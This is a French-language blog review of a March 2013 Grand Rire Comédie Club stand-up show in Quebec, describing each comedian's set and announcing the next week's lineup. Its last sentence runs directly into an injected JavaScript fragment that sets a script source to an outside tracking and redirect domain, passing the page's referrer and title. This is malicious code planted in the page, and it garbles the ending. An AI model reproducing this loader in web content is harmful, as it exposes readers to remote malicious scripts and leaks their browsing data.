C’est mercredi dernier, le 6 mars 2013, qu’a eu lieu la deuxième représentation du Grand Rire Comédie Club. Exceptionnellement, c’est l’humoriste Korine Côté qui a remplacé Olivier Martineau dans le rôle d’animateur.

Encore une fois, la salle était remplie de gens prêts à assister à un excellent spectacle d’humour. Mes coups de coeur personnels vont principalement à l’excellente animatrice/humoriste Korine Côté, au « magicien » Simon Laroche, à l’absurde Yannick De Martino et à l’humoriste/comédien Martin Vachon. Que de belles découvertes pour moi en humour, mise à part Yannick que je connaissais déjà assez bien étant donné son apparition à plusieurs reprises à En route vers mon premier gala.

Pour introduire le spectacle, c’est l’entrée de la flamboyante Korine Côté, une jeune femme sortie de l’École nationale de l’humour en 2006 (ENH). Depuis sa sortie de l’ENH, elle enchaîne les présences à divers niveaux (événements, émissions, festivals, etc.), qui nous font la connaître de plus en plus et qui lui vaut plusieurs nominations. C’est elle qui se cache derrière les deux superbes web-séries Simple comme Korine et Rénove ton couple. Bref, tout qu’un tableau bien garni pour cette jeune femme humoriste de la relève. En tant qu’animatrice de la soirée, Korine s’est donnée dans un numéro tout simplement solide d’un point de vue textuel, mais également très bien rendu au niveau de son dynamisme et son langage corporel. Un numéro basé majoritairement sur les techniques de publicisation de la Coors Light, sur les seins, ainsi que les fabuleuses émissions au Canal D. Toute son imagination et sa facilité à exprimer ainsi qu’à rendre ses questionnements/affirmations font d’elle une humoriste qui m’a fait rire tout au long du spectacle et je crois que ce rire s’est généralisé à la totalité de la salle.

Gabrielle Caron a terminé l’École nationale de l’humour en 2009. Elle ne m’était pas inconnue non plus, comme la plupart des humoristes de la relève ayant participer à En route vers mon premier gala. En effet, elle s’est retrouvée à deux reprises à cette émission diffusée sur Vox. Malheureusement, elle n’a pas gagné. Par contre, elle nous a montré, autant dans l’émission que mercredi passé, qu’elle est une personne avec énormément de dynamisme, de charme et qui sait captiver l’intérêt des auditeurs. Sa belle joie de vivre et son sourire constant nous font l’apprécier tout de suite au premier coup d’oeil. Son texte rapportait principalement un ramassis de tout ce qui fait peur dans la vie: des films, de l’eau et du jeu ouija aux légendes incontestées des dames qui apparaissent dans le miroir. On se reconnaît beaucoup dans ses propos, ce qui nous fait sourire presque constamment lors de son numéro.

Yannick De Martino, fait partie de ceux qui ont su se démarquer à En route vers mon premier gala en gagnant l’édition 2011. En effet, son humour absurde a su en charmer plusieurs. Son numéro choisit au Grand Rire Comédie Club ne faisait pas exception à la règle. Toutes ses réflexions, provenant d’un bain super relaxant, a su nous faire pouffer de rire du début à la fin. Ses propos, un peu décousu, du dragon aux végétariens et des végétaliens aux folles de ses anciens couples. Bref, tout qu’un numéro qui finit dans une suite logique de sa sortie du bain…!

Simon Laroche, alias Zacarien le magicien, est probablement MA découverte de la soirée. Accompagné de son assistante Shirley (Josiane Aubuchon), ce magicien maladroit a su me surprendre. Son talent naturel de scène et son personnage plutôt malhabile a mis de la diversité dans la soirée. L’exécution de son numéro était un n’importe quoi tellement bien interprété que ce numéro aurait pu finir une soirée sur une excellente note. Parfait aussi pour finir une première partie, soit avant l’entracte.

C’est d’ailleurs sur ce magique numéro que le temps de reprendre une bière est venu; petite entracte de quinze minutes déclarée.

Korine Côté fait son retour en tant qu’animatrice avec un numéro percutant sur l’émission Les anges de la rénovation. Encore une fois, ses propos, étant tellement véridiques et rapportés tellement de façon humoristique, m’ont complètement scié en deux et je ne crois pas avoir été la seule. J’ai ris fort du début à la fin.

Josiane Aubuchon, finissante de l’École nationale de l’humour l’année dernière, a bâti un numéro sur notre emblème hivernal, le bonhomme Carnaval. Cette femme de la campagne, très à l’aise sur une scène, a donné une belle prestation. Malgré le fait que son numéro correspondait moins à l’humour que je recherche, je suis persuadée que son dynamisme et son talent fera en sorte que d’ici quelques années, on entendra beaucoup parler d’elle.

Martin Vachon, humoriste, mais aussi comédien facilement retrouvable dans La Galère et dans la nouvelle série québécoise Mémoires Vives, a su lui aussi me surprendre non seulement par son charisme, mais aussi par la solidité de son numéro. Son aisance sur scène et sa facilité à nous raconter ses anecdotes d’une manière hilarante m’ont conquise. Une autre belle découverte pour moi. L’anecdote de son voyage avec Pierre Hébert à Las Vegas m’a donné mal aux joues, sans oublier les autres propos qu’il a abordé tels les lendemains de brosse, les allergies, le testament et le sexe. Un humoriste très talentueux à découvrir.

Présentée par son ami Martin Vachon, Korine Côté était aussi sur la belle brochette d’humoristes qu’on recevait au Grand Rire Comédie Club cette semaine. Elle nous fait un autre numéro, lui sur la cigarette, qui encore une fois a fait honneur à son grand talent. Un numéro plutôt court, mais qui nous a rentré dedans comme une tonne de brique.

Bref, un gros merci à Québécomm pour la belle soirée humoristique. N’oubliez pas votre rendez-vous hebdomadaire la semaine prochaine, mercredi le 13 mars 2013, où Korine Côté saura nous animer encore, en remplacement temporaire d’Olivier Martineau. Elle accueillera d’autres superbes humoristes tels que Sébastien Bourgault, Richardson Zéphir, Alexandre Roy, François Boulianne, Mariana Mazza et Vincent Richer. C’est un rendez-vous!!!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;